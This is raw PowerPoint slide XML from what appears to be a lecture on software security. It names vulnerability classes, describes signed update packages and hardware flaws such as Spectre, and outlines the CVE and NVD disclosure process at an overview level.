                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{315CDAEE-E976-A948-A9D7-F36DDE8D17F6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5936729" y="4314596"/>
            <a:ext cx="2517420"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Update data area (p4)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A47C1794-7F06-A040-800F-1A44B3CA3F71}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933907" y="5539909"/>
            <a:ext cx="21400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Other (p6)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="47" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{11B45907-69BE-5245-B160-7FCEAE8B43F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5933906" y="4865977"/>
            <a:ext cx="21400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Inactive (p5)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="1025" name="Picture 1" descr="page41image9520768">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A2B9C5C-D90B-5A4E-98E1-E896EA3EC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370" y="2324152"/>
            <a:ext cx="2857500" cy="26924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A5985F4-169E-E648-BF91-ACF17E62E588}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9918640" y="5501785"/>
            <a:ext cx="1689886" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From Hallinan</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23037916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13982"/>
            <a:ext cx="11827823" cy="1213803"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>The dark side of program creation: bugs, exploits and vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="679889" y="2336553"/>
            <a:ext cx="10658049" cy="4019798"/>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Vulnerability classes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Control flow hijacking</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Buffer overflow</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Escape to libc</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>ROP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Script vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Command/SQL injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>TOCTOU (Time of check, time of use).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Secret disclosure</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Side channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Arial" charset="0"/>
              <a:ea typeface="Arial" charset="0"/>
              <a:cs typeface="Arial" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>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100</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1611368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89" y="81089"/>
            <a:ext cx="11839074" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Updating concepts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="586630" y="1595726"/>
            <a:ext cx="10787223" cy="4943187"/>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Software is often discovered to have flaws after distribution so one, now standard, prophylactic measure is distributing updates.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Updates can change any and all software, configuration, firmware (like BIOS code on PC’s) and even microcode.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>This is often achieved by running an update service and designating a pre-provisioned public key of a trusted update service.  Authenticated updates ae installed by the service automatically.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Updates are accumulated into packages which are hashed and signed (by the trusted key).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Different vendors format components of an update differently especially in the IoT world where vendors often encrypt updates to keep them “secret.”</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The entity with the update key is unconditionally powerful a bad update can destroy system security.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>IoT systems are particularly bad at doing secure updates.</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101</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11867129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Anatomy of an update package</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="426720" y="1692911"/>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Contents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Bootloader</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Kernel</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>File system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Features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Safe rollback</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Symmetric and asymmetric update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Bootloader support: U-Boot </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Volume formats: MTD, UBI, MBR and UEFI partitions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Signed images</a:t>
            </a:r>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102</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2075304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56950"/>
            <a:ext cx="11827823" cy="1213803"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Darker still: Hardware vulnerabilities</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="790832" y="2036618"/>
            <a:ext cx="10870738" cy="4019798"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Floating point</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Famous Intel bug</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Side channels</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Spectre</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>EMI</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Erroneous execution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Intel errata</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103</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="18552409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1" y="237550"/>
            <a:ext cx="11677135" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Code vulnerabilities generally</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="373224" y="1849043"/>
            <a:ext cx="11526332" cy="4771407"/>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The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CERT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> is a federally funded program run on behalf of DHS by SEI.  They have a section on SCADA vulnerabilities.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The common vulnerability database is hosted by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Mitre</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t> and is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F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Public site for reporting discovered vulnerabilities in widely distributed products.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Usually software some hardware.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>When reported, vulnerability is assigned an identifier, possibly verified and reported to vendor.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vendor is given a period of time to remediate vulnerabilities and issue a patch.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Assigned  severity (numerical score from 1-10).  10 is bad.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Vulnerability is disclosed and enhanced vulnerability information is recorded in national vulnerability database (NVD).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Over 118,000 reported.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Over 16000 reported in 2018.</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104</a:t>
            </a:fld>
